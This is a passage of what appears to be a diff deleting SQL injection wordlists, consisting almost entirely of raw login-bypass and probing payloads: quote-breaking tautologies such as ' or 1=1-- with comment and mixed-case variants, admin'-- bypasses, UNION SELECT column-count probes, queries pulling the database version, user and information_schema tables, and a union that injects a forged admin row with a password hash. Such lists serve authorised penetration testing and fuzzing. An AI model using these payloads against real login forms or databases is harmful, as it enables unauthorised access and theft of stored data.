"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
